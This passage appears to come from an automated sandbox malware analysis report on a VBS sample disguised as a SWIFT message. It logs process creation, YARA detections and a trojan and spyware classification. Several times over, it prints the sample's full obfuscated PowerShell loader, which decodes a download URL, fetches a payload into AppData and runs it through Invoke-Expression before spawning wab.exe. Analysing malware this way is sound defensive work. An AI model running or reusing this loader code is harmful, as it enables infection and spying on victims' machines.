(Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343DDC822_2_00007FFD343DDC82
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343DCED62_2_00007FFD343DCED6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343D62382_2_00007FFD343D6238
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343D26582_2_00007FFD343D2658
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343D3BFB2_2_00007FFD343D3BFB
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD343D53F22_2_00007FFD343D53F2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_086E10105_2_086E1010
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_086E18E05_2_086E18E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_086E0CC85_2_086E0CC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_027C41C811_2_027C41C8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_027CE6D011_2_027CE6D0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_027C4A9811_2_027C4A98
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_027CA99011_2_027CA990
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_027C3E8011_2_027C3E80
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C8452C11_2_24C8452C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C8C81C11_2_24C8C81C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C8655011_2_24C86550
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C8578011_2_24C85780
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C8586811_2_24C85868
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA7DC811_2_24CA7DC8
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA55E011_2_24CA55E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CAC1E011_2_24CAC1E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CAB28811_2_24CAB288
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA663011_2_24CA6630
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA238811_2_24CA2388
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA004011_2_24CA0040
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA5D3011_2_24CA5D30
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24CA76E811_2_24CA76E8
            Source: Swift_Message#1234323456.vbsInitial sample: Strings found which are bigger than 50
            Source: amsi64_416.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: amsi32_3428.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@12/7@4/4
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Amarantfarvers.BipJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_03
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMutant created: NULL
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_upctm0t2.0yj.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=416
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3428
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Swift_Message#1234323456.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
